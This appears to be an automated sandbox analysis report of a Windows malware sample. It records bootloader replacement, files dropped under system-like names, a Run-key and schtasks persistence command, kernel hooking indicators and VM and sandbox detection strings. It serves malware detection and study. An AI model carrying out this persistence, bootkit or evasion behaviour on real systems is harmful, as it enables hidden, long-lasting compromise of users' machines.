            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 42.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: injector.exe.14.drStatic PE information: section name: _RDATA
            Source: windefender.exe.14.drStatic PE information: section name: UPX2
            Source: bootmgfw.efi.14.drStatic PE information: section name: .xdata
            Source: bootx64.efi.14.drStatic PE information: section name: .xdata
            Source: EfiGuardDxe.efi.14.drStatic PE information: section name: .xdata
            Source: NtQuerySystemInformationHook.dll.14.drStatic PE information: section name: _RDATA
            Source: NtQuerySystemInformationHook.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x2279d
            Source: EfiGuardDxe.efi.14.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
            Source: windefender.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x20ae45
            Source: bootmgfw.efi.14.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: injector.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x54ea2
            Source: bootx64.efi.14.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: csrss.exe.10.drStatic PE information: real checksum: 0x45db04 should be: 0x4549c8
            Source: 4t4y4r89UZ.exeStatic PE information: real checksum: 0x45db04 should be: 0x4549c8
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior:

            barindex
            Creates files in the system32 config directoryShow sources
            Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
            Drops executables to the windows directory (C:\Windows) and starts themShow sources
            Source: C:\Windows\System32\fodhelper.exeExecutable created and started: C:\Windows\rss\csrss.exe
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnowJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnowJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnowJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            May modify the system service descriptor table (often done to hook functions)Show sources
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: VMUSRVC.EXE
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXE4T4Y4R89UZ.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE4T4Y4R89UZ.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
            Source: csrss.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXESVCHOST.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXE$
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXESEARCHUI.EXESEARCHUI.EXESVCHOST.EXEHXTSR.EXEHXTSR.EXE
            Source: csrss.exeBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS
